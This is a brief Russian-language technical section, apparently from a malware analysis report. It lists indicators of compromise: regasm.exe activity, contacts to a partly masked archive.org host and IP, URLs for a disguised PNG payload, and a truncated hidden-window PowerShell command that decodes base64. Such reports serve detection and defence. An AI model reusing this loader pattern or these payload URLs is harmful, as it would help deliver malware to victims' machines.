Техническая информация
- %WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe
- 'ia#####9.us.archive.org':80
- '19#.#27.135.219':80
- http://ia#####9.us.archive.org/28/items/msi-pro-with-b-64_20251007_2240/MSI_PRO_with_b64.png
- http://19#.#27.135.219/up/anyname.txt
- DNS ASK ia#####9.us.archive.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('W05ldC5TZXJ2aWNlUG9pbnRNYW5hZ2VyXTo6U2VjdXJpdHlQcm90b2NvbCA9IFtOZXQuU2VjdXJ... (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe'